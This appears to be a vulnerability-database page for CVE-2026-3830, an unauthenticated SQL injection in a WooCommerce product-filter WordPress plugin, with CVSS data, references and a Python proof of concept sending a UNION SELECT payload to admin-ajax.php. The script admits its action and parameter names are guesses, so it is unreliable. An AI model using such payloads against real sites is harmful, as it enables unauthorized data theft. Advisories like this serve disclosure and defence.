CVE-2026-3830

Description

The Product Filter for WooCommerce by WBW WordPress plugin before 3.1.3 does not sanitize and escape a parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Product Filter for WooCommerce by WBW < 3.1.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual Proof of Concept for CVE-2026-3830
# This script demonstrates the potential exploit by sending a malicious SQL payload.
import requests

def exploit(target_url):
    # The vulnerable endpoint is typically an AJAX handler used by the plugin
    url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Payload aims to extract the database version using SQL Injection
    # Note: The actual parameter name depends on the plugin's source code analysis
    payload = {
        "action": "wbw_filter_action",  # Hypothetical action name
        "params[value]": "1' UNION SELECT 1, version(), 3-- -"
    }
    
    try:
        response = requests.post(url, data=payload)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check response for SQL errors or leaked data.")
            print(response.text[:500])
        else:
            print("[-] Target might be down or filtering requests.")
    except Exception as e:
        print(f"[!] Error: {e}")

# Usage: exploit("http://example.com")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3830
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3830
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3830/
[4] VulDB https://vuldb.com/cve/CVE-2026-3830
[5] https://wpscan.com/vulnerability/768014fd-0403-4182-b19e-3d46c92d8755/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3830", "sourceIdentifier": "[email protected]", "published": "2026-04-13T07:16:50.270", "lastModified": "2026-04-15T15:05:47.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Product Filter for WooCommerce by WBW WordPress plugin before 3.1.3 does not sanitize and escape a parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://wpscan.com/vulnerability/768014fd-0403-4182-b19e-3d46c92d8755/", "source": "[email protected]"}]}}